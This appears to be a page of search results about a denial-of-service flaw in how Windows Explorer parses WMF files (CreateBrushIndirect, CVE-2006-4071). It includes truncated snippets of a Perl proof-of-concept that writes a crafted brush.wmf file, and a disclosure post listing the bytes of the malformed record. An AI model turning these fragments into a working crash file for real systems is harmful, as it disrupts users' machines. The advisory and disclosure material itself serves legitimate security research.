8 matches found
MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit
Exploit for unknown platform in category dos / poc ========================================================= MS Windows Explorer WMF CreateBrushIndirect DoS Exploit ========================================================= !/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E ";...
Microsoft Windows Explorer - .WMF CreateBrushIndirect Denial of Service
Microsoft Windows Explorer - .WMF CreateBrushIndirect Denial of Service !/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E "; print "\n\ngenerating brush.wmf..."; openWMF, "./brush.wmf" or die "cannot create wmf file\n"; print WMF...
Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service
!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E "; print "\n\ngenerating brush.wmf..."; openWMF, "./brush.wmf" or die "cannot create wmf file\n"; print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; print WMF...
Microsoft Windows WMF invalid pointer dereference
Invalid pointer dereference in GDI on CreateBrushIndirect function...
WMF CreateBrushIndirect vulnerability (DoS)
The following WMF exploit appeared on milw0rm today: http://www.milw0rm.com/exploits/3111 The vulnerability is a result of the WMF parser passing a value from the file as a pointer argument to the CreateBrushIndirect function. The function dereferences the pointer and dies with an access violatio...
CVE-2006-4071
Sign extension vulnerability in the createBrushIndirect function in the GDI library gdi32.dll in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service application crash via a crafted WMF file...
CVE-2006-4071
Sign extension vulnerability in the createBrushIndirect function in the GDI library gdi32.dll in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service application crash via a crafted WMF file...
[Full-disclosure] 0-day XP SP2 wmf exploit (some details)
There is some details for wannabees : 1. 'Bad' wmf record: 07 00 00 00 length of record in words FC 02 type CreateBrushIndirect 08 00 00 00 00 00 00 80 'packed' good old Win16 days LOGBRUSH data: 08 00 - 'packed' lpStyle may be BSDIBPATTERNPT 6 or BSDIBPATTERN8X8 8 00 00 00 00 - COLORREF any 00 8...